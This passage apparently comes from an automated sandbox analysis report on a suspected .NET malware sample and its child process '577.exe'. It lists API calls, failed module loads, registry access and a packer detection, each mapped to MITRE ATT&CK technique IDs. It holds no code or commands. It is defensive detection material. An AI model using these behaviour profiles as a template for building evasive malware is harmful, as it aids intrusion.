\"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-quirks-l1-1-0.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\combase.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter psapi.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-xstate-l2-1-0.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter bcrypt.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005100)\n \"577.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll (UID: 00000000-00005100)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\ole32.dll\" - [base:0; Status:c0000135]\n \"577.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"577.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"577.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"577.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"577.exe\" failed to load missing module \"api-ms-win-core-quirks-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"577.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" - [base:0; Status:c0000135]\n \"577.exe\" failed to load missing module \"%WINDIR%\\system32\\combase.dll\" - [base:0; Status:c0000135]\n \"577.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" - [base:0; Status:c0000135]\n \"577.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll\" - [base:0; Status:c0000135]\n \"577.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77260000\n \"577.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77260000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"577.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"577.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"577.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-7", "type": 10, "name": "Loads the CLR Loader DLL", "description": "\"577.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 62C70000\n \"577.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 63420000", "origin": "Loaded Module", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"577.exe\" (UID: 00000000-00005100)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"577.exe\" (UID: 00000000-00005100)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07\" was detected as \".NET\" and name: \"Library\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07\" was detected as \"VB.NET\" and name: \"Compiler\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"577.exe\" was detected as \".NET\" and name: \"Library\"\n \"577.exe\" was detected as \"VB.NET\" and name: \"Compiler\"\n \"577.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n \"577.exe\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-139", "relevance": 1, "name": "Dotnet code contains ability to modify/delete registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"SetValue\" in \"577.exe\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"CreateSubKey\" in \"577.exe\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"DeleteValue\" in \"577.exe\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"DeleteSubKeyTree\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00001916)\n 